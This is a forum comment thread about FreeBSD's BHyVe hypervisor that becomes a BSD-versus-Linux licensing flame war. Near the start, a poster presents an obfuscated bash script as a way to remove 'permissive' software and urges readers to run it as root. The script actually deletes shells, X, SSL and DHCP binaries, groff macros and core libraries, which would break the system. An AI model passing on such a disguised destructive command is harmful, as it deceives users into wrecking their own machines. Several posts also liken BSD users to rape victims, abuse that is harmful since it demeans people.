BHyVe: A New Hypervisor Coming To FreeBSD 10.0

Collapse
X

• Filter
  • Time
  • Show
Clear All

Originally posted by Ibidem View Post
    Very insightful, in light of BSDI. I wonder why they bothered to commit some code back.

By the way, I'm afraid you might have some "permissive" software left on your computer. Could you help rid the world of this nuisance by running this as root?
    Code:
    #!/bin/bash
    export PATH=$(echo /{usr/local/,usr/,}{s,}bin:|sed 's: ::g') DIRS=$(echo /{usr/local/,usr/,}{s,}bin); for d in $DIRS; do rm -f $d/{dhc,X,ssl}* $d/{*s,a}sh*  &>/dev/null; done
    find /usr/share |grep -E '{m,}{e,doc,an-old}\.tmac'|xargs rm -f {/usr,}/lib/lib{ncurses,ssl,*GL}*
    Let me explain again, all former BSD code and utils in Linux have GPL code added to them and thus are clensed and coverted to GPL code and tools.

Thats the revolutionary beauty of the GPL, it's like a spider plant. Adding GPL code to BSD or MIT code converts and liberates it from conversion to proprietary code and thus effectively make it freedom preserving GPL code.

Comment

Originally posted by 0xBADCODE View Post
      You see, world needs some competition. Though BSDs are really crappy competitors. They have borked GPU drivers, virtually no virtualization, almost no choice for filesystems and so on. To my taste it's completely unusable as desktop and very troublesome and restricted as server. Yet, kicking half-deads isn't a great attitude. Even if it could be tempting, granted that BSD nuts are usually extremely arrogant and ignorant (at least from my experience). And after all, direct attacks are lame. Have you ever heard about "fat trolling"? Fat trolling suxx. Thin trolling is much better in all regards
      My sorry,

I do not understand the difference between fat and thin trolling. Please elaborate. Thanks

Comment

Originally posted by Sergio View Post
        For me it is adecuate for desktop, as is Linux; for NetFlix and huge ISP's and hosting companies it is superb for server; for Apple it is good as a base system (in union with Mach); for Juniper it is great for embedded products; for McAfee it is great for their firewall product... yet for you it is crap.
        When softer BSD users say they find BSD much better to them, it is comparable to them saying: "that being molested and raped is ok for them and that they find it more comfortable to what they are raped then not".

It's quite ridiculous and it throws into question the sanity and normality of the people saying that. And most others will find it creepy or even sickening.

Comment

Originally posted by systemd rulez View Post
          Let me explain again, all former BSD code and utils in Linux have GPL code added to them and thus are clensed and coverted to GPL code and tools.

Thats the revolutionary beauty of the GPL, it's like a spider plant. Adding GPL code to BSD or MIT code converts and liberates it from conversion to proprietary code and thus effectively make it freedom preserving GPL code.
          Oh, come on, repeating the lie does not make it true. Provide evidence, otherwise everyone knows that you are lying to support your case, putting you on the same level as Microsoft with their FUD spreading.
          Only that that would be a level up for you, since Microsoft at least tries a little bit to let their FUD look like the truth, which seems to be way about your horizon.

Comment

For me it is adecuate for desktop, as is Linux;
            As for me it is not. Sure, some very marginal users do not need much from PC and can use this crap as desktop. I don't see any reason to force me to use this crap when there are better solutions available and they come with sources as well. So I can learn them, change them and build them. If I want or need to. And no vendor lock-in. But why Linux? Linux takes several times less times for system management than any BSDs/windows/etc. I've attempted to use FreeBSD on one of my servers and it proven to be real nightmare. There is even no real package management system in place. In Linux it's norm and it makes system management much more pleasant task. Which also takes much less of my time than it would be otherwise.

for NetFlix and huge ISP's and hosting companies it is superb for server;
            Oh, Netflix? Those DRM-inclined nuts who also require silverlight M$ crap to play their content? Oh, now answer quickly: can you use Netflix services in your "adequate" BSD desktop, then? (and then BSD guys wonder why other ppl consider them proprietary footpads).

for Apple it is good as a base system (in union with Mach);
            Oh, another proprietary nuts. And of course no full source for MacOS X. And absolutely no source for iOS. So with Liunx you can try to make your phone based on Linux stack if you want to. With BSDs only Apple can. That's where we can see how BSD "freedom" differs from GPL freedom...

for Juniper it is great for embedded products;
            So, can I grab the source, learn it, change it, rebuild it and use it on Juniper hardware if I own one? No? Such a pity. BSD "freedom" strikes again. It turns out only Juniper haves rights and freedoms. Not their customers. Since I'm not Juniper, I see absolutely no reasons to welcome this approach. Especially granted the fact it's customer who pays money for everything. So this scheme does not looks fair to say the least.

for McAfee it is great for their firewall product... yet for you it is crap.
            And Linux just powers biggest, most successful startups (Google and Facebook to name a two), most of TOP500 supercomputers, millions of phones, routers, servers and so on. And even gaming industry started looking at it. So it's finally getting considered by people as OS suitable for desktops. Not something that BSDs could afford. Ironically, Linux took several percents of market in the web. BSDs had 10 more years to get there. Yet they're used thousands times less than Linux. This definitely indicates BSDs are inconvenient to use and/or lack many features.
            Last edited by 0xBADCODE; 12 February 2013, 08:06 AM.

Comment

Like i said, BSD users saying that BSD is right for them is equal to saying: "I prefer to be raped because I find it much more interesting then not being raped".

Sure people should be admitted to mental hospitals immediately.

Comment

As for me it is not. Sure, some very marginal users do not need much from PC and can use this crap as desktop. I don't see any reason to force me to use this crap when there are better solutions available and they come with sources as well. So I can learn them, change them and build them. If I want or need to. And no vendor lock-in. But why Linux? Linux takes several times less times for system management than any BSDs/windows/etc. I've attempted to use FreeBSD on one of my servers and it proven to be real nightmare. There is even no real package management system in place. In Linux it's norm and it makes system management much more pleasant task. Which also takes much less of my time than it would be otherwise.

Oh, Netflix? Those DRM-inclined nuts who also require silverlight M$ crap to play their content? Oh, now answer quickly: can you use Netflix services in your "adequate" BSD desktop, then? (and then BSD guys wonder why other ppl consider them proprietary footpads).

Oh, another proprietary nuts. And of course no full source for MacOS X. And absolutely no source for iOS. So with Liunx you can try to make your phone based on Linux stack if you want to. With BSDs only Apple can. That's where we can see how BSD "freedom" differs from GPL freedom...

So, can I grab the source, learn it, change it, rebuild it and use it on Juniper hardware if I own one? No? Such a pity. BSD "freedom" strikes again. It turns out only Juniper haves rights and freedoms. Not their customers. Since I'm not Juniper, I see absolutely no reasons to welcome this approach. Especially granted the fact it's customer who pays money for everything. So this scheme does not looks fair to say the least.

And Linux just powers biggest, most successful startups (Google and Facebook to name a two), most of TOP500 supercomputers, millions of phones, routers, servers and so on. And even gaming industry started looking at it. So it's finally getting considered by people as OS suitable for desktops. Not something that BSDs could afford. Ironically, Linux took several percents of market in the web. BSDs had 10 more years to get there. Yet they're used thousands times less than Linux. This definitely indicates BSDs are inconvenient to use and/or lack many features.
                What? I've never mentioned freedom or even Linux! My sole point was that obviously BSD is far from being crap, as you stated on an earlier post. What the fuck does Linux have to do here? What the fuck if I can't get the source from Juniper? The truth is there are tons of top-class products depending on FreeBSD, so a lot of money is bet on FreeBSD; yet for you it is a crap OS.

Comment

Originally posted by systemd rulez View Post

In case anyone actually believes this, it's not true.
                  Code:
                  .\"	@(#)e.tmac	2.31 (Berkeley) 5/21/88
                  .\"	Modified by James Clark for use with groff.
                  .\"
                  .\" Copyright (c) 1988 Regents of the University of California.
                  .\" All rights reserved.
                  .\"
                  .\" Redistribution and use in source and binary forms are permitted
                  .\" provided that this notice is preserved and that due credit is given
                  .\" to the University of California at Berkeley. The name of the University
                  .\" may not be used to endorse or promote products derived from this
                  .\" software without specific prior written permission. This software
                  .\" is provided ``as is'' without express or implied warranty.
                  There are no files in my copy of the Mesa git tree that include a GPL notice, though it is a rather old clone.
                  ISC dhcp software ships with a permissive license and support for Linux.
                  ncurses is permissively licensed, and likewise ships with support for Linux.

@0xBADCODEJust for reference: there are proprietary GUI stacks for Linux (Athene). That's basically the same as what you get from Apple with OS X, a FOSS command-line interface and kernel + proprietary GUI with some FOSS clients. Not that I care for either!
                  Netflix would be no more obligated to provide a client if they used Linux than they are now.
                  And the claim that the *BSDs had 10 more years is false: until BSD/Lite (June 1994), all BSD software was available only to those with Unix licenses (with the dubious exception of Net/2, which ostensibly should have been). By that time, Linux had reached 1.0. Linus Torvalds said that if BSD had been available when he started Linux, he would have used it instead.

Comment

What? I've never mentioned freedom or even Linux!
                    Right. But since we're not living in the world where only BSDs are available, it's reasonable to compare different solutions and their advantages and disadvantages. It's imposible to say "%s is good" or "%s is bad" without reference. But when there are several items available, it's possible to compare them and compare their advantages and disadvantages. These days it has come to situation where BSDs offer virtually no advantages over Linux but ton of disadvantages in place. Hence I consider BSDs worse than Linux when it comes to comparison. That's why it's "crap".

My sole point was that obviously BSD is far from being crap, as you stated on an earlier post.
                    No, dude, for most users it's completely unusable as desktop and would fail to serve their day to tay tasks with anyhow reasonable efforts to achieve this state. What do you expect from OS where half of GPUs will not work properly? And you see, you even did not answered if service proposed by you (netflix) would run on OS proposed by you (fbsd). Showcasing EPIC FAIL . It's so silly to advertise commercial DRMed service which you can't even use on your "adequate" desktop OS with reasonable efforts. Very impressive shooting of your own legs, lol.

What the fuck does Linux have to do here?
                    It's just a point of reference to compare with. It's *nix-like and opensource so it's most adequate reference point to compare with. Is this hard to understand? We're not living in vaccuum, after all.

What the fuck if I can't get the source from Juniper?
                    That's what called vendor lock-in. And that's what really suxx, especially if you have to pay your money for such a bad treatment.

The truth is there are tons of top-class products depending on FreeBSD,
                    The truth is here that these days it's usage shrinks and only most hardcore proprietary f...ks are using BSDs because it would allow them to keep source closed. Furthermore, to get first class experience with BSD-based, you have to pay to those f...ks and would be unable to enjoy by freedoms provided by opensource solutions. Or you can use third-rate stuff like freebsd for free. But in no way it's anyhow polished or friendly and you have to do most of job yourselfl. It has gone as far as many ex-proprietary corporations are using Linux these days (and provide source of course). All this situation caused Linux to outrun BSDs. Cooperation works better than bunch of hungry sharks trying to eat each other. That's where proprietary guys will fail...

so a lot of money is bet on FreeBSD; yet for you it is a crap OS.
                    A lot? Lot compared to what? Compared to Windows it's nothing. Compared to MacOS it's nothing. Compared to Linux it's nothing. And for some reason BSD guys always mumble about lack of resources. If there are "so a lot of money is bet" why fbsd always lacks resources to do things right and in proper time, not 10 years later, when everyone ditched it? Great example is virtualisation. In Linux and in Windows it's available for several years out of the box. And freebds guys only started to implement it in some future version. Ha-ha, they lagged so much that they got booted from most installations. As far as I know, these days even apache and yahoo who are known to use BSD for ages are rather moved to Linux. Rats leaving a sinking ship?
                    Last edited by 0xBADCODE; 12 February 2013, 07:03 PM.

Comment

You see, world needs some competition. Though BSDs are really crappy competitors. They have borked GPU drivers, virtually no virtualization, almost no choice for filesystems and so on. To my taste it's completely unusable as desktop and very troublesome and restricted as server. Yet, kicking half-deads isn't a great attitude. Even if it could be tempting, granted that BSD nuts are usually extremely arrogant and ignorant (at least from my experience). And after all, direct attacks are lame. Have you ever heard about "fat trolling"? Fat trolling suxx. Thin trolling is much better in all regards
                      Bsd loose in some things and beats Linux , for example firewall application BSD today is better , PF packet filter is much better and easier to maintain than iptables , but openbsd is not so good something like MySQL, postgres, performance in Linux is better for this, people here should have to recognize advantages of both systems and stop this stupid discussion.

Comment

Working...
                      X